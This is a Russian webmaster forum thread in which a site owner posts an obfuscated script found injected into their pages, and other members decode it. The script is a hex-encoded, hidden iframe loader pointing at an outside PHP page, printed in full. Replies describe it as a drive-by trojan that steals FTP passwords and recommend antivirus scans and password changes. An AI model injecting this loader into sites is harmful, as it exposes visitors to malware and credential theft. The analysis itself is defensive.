- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Народ, подскажите, пожалуйста, что это: вирус или троян? Если троян, то на какой адрес он посылает информацию?
Какой алгоритм его действия?
Вредоносный скрипт:
<script>function v47a4f475a4e08(v47a4f475a55d5){ var v47a4f475a5da5=16; return(parseInt(v47a4f475a55d5,v47a4f475a5da5));}function v47a4f475a6d44(v47a4f475a7514){ var v47a4f475a8c82=2; var v47a4f475a7ce3='';for(v47a4f475a84b3=0; v47a4f475a84b3<v47a4f475a7514.length; v47a4f475a84b3+=v47a4f475a8c82){ v47a4f475a7ce3+=(String.fromCharCode(v47a4f475a4e08(v47a4f475a7514.substr(v47a4f475a84b3, v47a4f475a8c82))));}return v47a4f475a7ce3;} document.write(v47a4f475a6d44('3C696672616D65206E616D653D276438393436633927207372633D27687474703A2F2F7468656C6F62616E6F66662E636F6D2F6D7973686F702F746573742F696E6465782E706870272077696474683D373939206865696768743D333531207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>
не факт, что это вообще вирус или троян, это антивирь вам скажет.
Скорее всего это просто закодированный код javascript, например, с дора, спрятанный редирект ;))
В принципе можно раскодировать, но пока лень, нужно минут 20 повозиться. Подобное уже раскодировал...
----
... Раскодировал, достаточно оказалось 3 минут... ифрейм, подгружается с сайта (thelobanoff_com), может и правда троянчик... ссылку точную не даю, ибо найдутся ламеры, которые полезут... нафиг надо.
Кто скажет мне что это за хрень и на какие адреса она скидывала мои пароли, тот получит приз!!!
В качестве приза - скрипт поисковика, который ищет по базе google и выдаёт результаты поиска на ваш сайт! Пример тут http://www.coolnarod.ru/info/poisk.htm
Скрипт просто с кучей мусора, длинными названиями, все это чтобы скрыть всего одну строчку:
Строчка закодена номерами ASCII символов в 16-ичном коде.
Очевидно, грузит в iframe скрипт "http://thelobanoff.com/myshop/test/index.p�p"
Скрипт просто с кучей мусора, длинными названиями, все это чтобы скрыть всего одну строчку:
Строчка закодена номерами ASCII символов в 16-ичном коде.
Очевидно, грузит в iframe скрипт "http://thelobanoff.com/myshop/test/index.p�p"
я её уже видел ;), в конце php
ТС, поставьте себе антивирь и на всяк случай еще и AVZ! Я заметил вы уже не первый раз от троянчиков страдаете.
Кто скажет мне что это за хрень и на какие адреса она скидывала мои пароли, тот получит приз!!!
В качестве приза - скрипт поисковика, который ищет по базе google и выдаёт результаты поиска на ваш сайт! Пример тут http://www.coolnarod.ru/info/poisk.htm
Не парься это старый вирус. Он скидывает только пароли ftp.
Удали вирус с компа, и смени пароли ftp для всех сайтов.
Куда он скидывает хрен занет, по этой ссылки он загружает к тебе на комп прогу, через дырявый explorer.
Master812, Для разгадывания подобных ребусов есть удобная утилитка (под win23 платформу) - http://www.yandex.ru/yandsearch?text=download+shtirlitz&rpt=rad
Мало этой темы: /ru/forum/203466 ?
лечитесь... от вирусов, а Вы все разговоры ведете.
Master812, Для разгадывания подобных ребусов есть удобная утилитка
для разгадывания подобных ребусов достаточно заменить document.write на alert ;)
Master812, DyaDya, radist, кто-нибудь из вас знает из какой программы (ftp-клиента) такие вирусы таскают пароли?
А то я поймал (вроде бы) как-то одного, так не знаю стащил ли он у меня пасы или нет...
чаще всего Windows/Total Commander